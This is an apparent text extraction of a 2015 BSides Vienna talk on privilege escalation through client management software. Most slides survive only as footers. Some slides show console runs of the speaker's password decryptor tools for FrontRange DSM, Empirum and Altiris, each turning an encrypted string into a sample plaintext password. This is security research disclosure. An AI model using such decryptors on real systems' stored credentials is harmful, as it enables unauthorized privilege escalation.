Privilege Escalation via Client Management Software
November 21, 2015
November 21, 2015 Matthias Deeg | BSidesVienna 0x7DF 1
Privilege Escalation via Client Management Software November 21, - - PowerPoint PPT Presentation
Privilege Escalation via Client Management Software November 21, 2015 November 21, 2015 Matthias Deeg | BSidesVienna 0x7DF 1 Who am I? Dipl.-Inf. Matthias Deeg Expert IT Security Consultant CISSP, CISA, OSCP, OSCE especially IT security
November 21, 2015 Matthias Deeg | BSidesVienna 0x7DF 1
November 21, 2015 Matthias Deeg | BSidesVienna 0x7DF 2
November 21, 2015 Matthias Deeg | BSidesVienna 0x7DF 3
November 21, 2015 Matthias Deeg | BSidesVienna 0x7DF 4
November 21, 2015 Matthias Deeg | BSidesVienna 0x7DF 5
November 21, 2015 Matthias Deeg | BSidesVienna 0x7DF 6
November 21, 2015 Matthias Deeg | BSidesVienna 0x7DF 7
November 21, 2015 Matthias Deeg | BSidesVienna 0x7DF 8
November 21, 2015 Matthias Deeg | BSidesVienna 0x7DF 9
Low-Privileged Domain (less trustworthy) High-Privileged Domain (more trustworthy)
November 21, 2015 Matthias Deeg | BSidesVienna 0x7DF 10
ProductService.exe NT AUTHORITY\SYSTEM ProductUI.exe DEFAULT_USER do something Perform tasks with high privileges, e. g.
Perform tasks with low privileges, e. g.
report something
Low-Privileged Domain (less trustworthy) High-Privileged Domain (more trustworthy)
November 21, 2015 Matthias Deeg | BSidesVienna 0x7DF 11
ProductService.exe NT AUTHORITY\SYSTEM ProductUI.exe DEFAULT_USER do something Perform tasks with high privileges, e. g.
Perform tasks with low privileges, e. g.
report something
November 21, 2015 Matthias Deeg | BSidesVienna 0x7DF 12
November 21, 2015 Matthias Deeg | BSidesVienna 0x7DF 13
November 21, 2015 Matthias Deeg | BSidesVienna 0x7DF 14
November 21, 2015 Matthias Deeg | BSidesVienna 0x7DF 15
November 21, 2015 Matthias Deeg | BSidesVienna 0x7DF 16
November 21, 2015 Matthias Deeg | BSidesVienna 0x7DF 17
November 21, 2015 Matthias Deeg | BSidesVienna 0x7DF 18
November 21, 2015 Matthias Deeg | BSidesVienna 0x7DF 19
November 21, 2015 Matthias Deeg | BSidesVienna 0x7DF 20
>fpd.exe k22D01816EADA56F850G09218CCD5GC1C4537FC70768629C14FF5B FrontRange DSM Password Decryptor v1.0 by Matthias Deeg <matthias.deeg@syss.de> - SySS GmbH (c) 2014 [+] Decrypted password: I wanna be a pirate!
November 21, 2015 Matthias Deeg | BSidesVienna 0x7DF 21
November 21, 2015 Matthias Deeg | BSidesVienna 0x7DF 22
November 21, 2015 Matthias Deeg | BSidesVienna 0x7DF 23
November 21, 2015 Matthias Deeg | BSidesVienna 0x7DF 24
November 21, 2015 Matthias Deeg | BSidesVienna 0x7DF 25
November 21, 2015 Matthias Deeg | BSidesVienna 0x7DF 26
$ ./epd '*SKZjk`&gp2' ____ ___ ___ |___ |__] | \ |___ | |__/ Empirum Password Decryptor v2.0 by Matthias Deeg - SySS GmbH (c) 2009-2015 [*] Read Empirum SETUP password [+] The decrypted password is: P@ssw0rd! $ ./epd 12B65B9A30D4237D0A5F8D50341581B64207CE74CDE2ED7632D8D55EDE775EF4A71631812F2E4E39BD951E26991F307F ____ ___ ___ |___ |__] | \ |___ | |__/ Empirum Password Decryptor v2.0 by Matthias Deeg - SySS GmbH (c) 2009-2015 [*] Read Empirum SYNC password [+] The decrypted password is: P@ssw0rd! E:\>epd.exe "A\"z!' ^|-%-*),$ \"!&(xiYJ|+./'(=&)+#$,#%./*X" ____ ___ ___ |___ |__] | \ |___ | |__/ Empirum Password Decryptor v2.0 by Matthias Deeg - SySS GmbH (c) 2009-2015 [*] Read Empirum EIS password [+] The decrypted password is: P@ssw0rd!
November 21, 2015 Matthias Deeg | BSidesVienna 0x7DF 27
November 21, 2015 Matthias Deeg | BSidesVienna 0x7DF 28
November 21, 2015 Matthias Deeg | BSidesVienna 0x7DF 29
November 21, 2015 Matthias Deeg | BSidesVienna 0x7DF 30
November 21, 2015 Matthias Deeg | BSidesVienna 0x7DF 31
$ ./altirispd.py vZW7Vflp5qwh2k4dfVQmFcaHEIcwkvuO _____________________________________________________________ / _____ _____ _____ \ / / ___| / ___/ ___| \ | \ `--. _ _\ `--.\ `--. | | `--. \ | | |`--. \`--. \ | | /\__/ / |_| /\__/ /\__/ / | \ \____/ \__, \____/\____/ ... decrypts your passwords! / \ __/ | / / |___/ __________________________________________/ / _________________/ (__) /_/ (oo) /------\/ / |____|| * || || ^^ ^^ Altiris Password Decryptor v1.0 by Matthias Deeg <matthias.deeg@syss.de> - SySS GmbH (c) 2013 [*] The plaintext password is: P4ssw0rd!
November 21, 2015 Matthias Deeg | BSidesVienna 0x7DF 32
November 21, 2015 Matthias Deeg | BSidesVienna 0x7DF 33
November 21, 2015 Matthias Deeg | BSidesVienna 0x7DF 34
November 21, 2015 Matthias Deeg | BSidesVienna 0x7DF 35
Tübingen / 29.09.2015 Seite 36 SySS GmbH